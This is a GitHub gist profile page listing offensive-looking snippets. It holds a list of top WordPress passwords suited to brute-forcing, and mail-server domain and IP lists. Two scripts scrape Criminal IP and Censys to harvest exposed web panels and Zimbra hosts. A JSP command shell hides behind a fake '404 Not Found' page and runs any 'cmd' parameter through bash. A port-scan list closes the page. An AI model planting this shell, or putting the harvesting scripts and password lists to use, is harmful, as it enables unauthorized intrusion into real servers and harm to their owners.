Skip to content

Instantly share code, notes, and snippets.

View aels's full-sized avatar
💭
No business. Everyone will die.

0xbadad aels

💭
No business. Everyone will die.
92 followers · 54 following
View GitHub Profile
@aels
aels / sucuri-top-wordpress-passwords.txt
Created October 10, 2022 17:32
admin
123456
password
12345678
666666
111111
1234567
qwerty
siteadmin
administrator
@aels
aels / email_provider_ip_ranges.txt
Created October 5, 2022 00:31
1.1.1.0/24
1.116.128.0/18
1.71.16.0/20
100.11.0.0/16
100.20.0.0/14
100.24.0.0/13
101.102.128.0/17
101.110.0.0/18
101.160.0.0/11
101.226.0.0/16
@aels
aels / inboxing_free_email_domains.txt
Created October 4, 2022 18:35
301lab.es
a-led.it
coacb.com
hotmail.com
outlook.com
ipa.com.tr
netmax.pl
live.com
buu.ac.th
upcmail.nl
@aels
aels / top_mail_subdomains.txt
Created October 2, 2022 18:42
This file has been truncated, but you can view the full file.
notary.vip.126.com,123.58.177.74,threatminer
webmail.mail.126.com,123.126.96.204,threatminer
dxyy.mail.126.com,123.126.96.184,threatminer
passport2.vip.126.com,59.111.239.53,crtsh
hw.mail.126.com,103.129.252.34,threatminer
c15460nfkii28870140ewdw45668uci2316rqnq930.mail.126.com,123.126.96.184,alienvault
r.mail.126.com,123.126.96.184,alienvault
cloud.mail.126.com,220.181.15.159,crtsh
freemail.126.com,103.129.252.34,alienvault
3g.126.com,123.126.96.184,threatminer
@aels
aels / top_mail_domains.txt
Created October 2, 2022 15:43
126.com
163.com
1und1.de
a1.net
active24.com
aikis.or.jp
aol.com
arcor.de
bay.wind.ne.jp
biglobe.ne.jp
@aels
aels / dump_criminalip_ips.js
Last active January 29, 2023 01:00
// https://www.criminalip.io/
q = escape('webpanel port:2031')+'&offset=';
data = '';
cursor = 0;
for(i=0;i<1e10;i++) {
request = new XMLHttpRequest();
request.open('GET', '/api/proxy/search/banner/search?query='+q+cursor, false);
request.send();
if (request.status === 200) {
data += JSON.parse(request.responseText).data.result.map(function(a){return a.ip_address+':'+a.open_port_no+','+(a.ssl_subject_common_name||'')}).join('\n')+'\n';
@aels
aels / cmd.jsp
Last active August 25, 2022 11:08 — forked from nikallass/cmd.jsp
Simple JSP cmd shell
<H1><CENTER>404 Not Found</CENTER></H1>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
String error = "";
if(cmd != null) {
String[] commandAndArgs = new String[]{ "/bin/bash", "-c", cmd };
String s = null;
Process process = Runtime.getRuntime().exec(commandAndArgs);
@aels
aels / dump_censys_ip.js
Created August 11, 2022 19:51
q = 'services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22';
str = '';
cursor = '';
for(i=0;i<1e10;i++) {
request = new XMLHttpRequest();
request.open('GET', '/_search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q='+q+cursor, false);
request.send();
if (request.status === 200) {
cursor = request.responseText.match(/&amp;cursor.+>next/gi)[0].replace(/&amp;/gi,'&').replace('>next','');
str += request.responseText.match(/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/gi).filter(function(value, index, self){return self.indexOf(value)==index}).join()+',';
@aels
aels / add_titles.php
Created July 12, 2022 22:28
<?php
if( empty($argv[1]) ) {
die("Usage:\nphp {$argv[0]} file");
}
function red($str) {
return "\033[91m".$str."\033[0m";
}
@aels
aels / top100ports.txt
Created July 7, 2022 06:04
79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157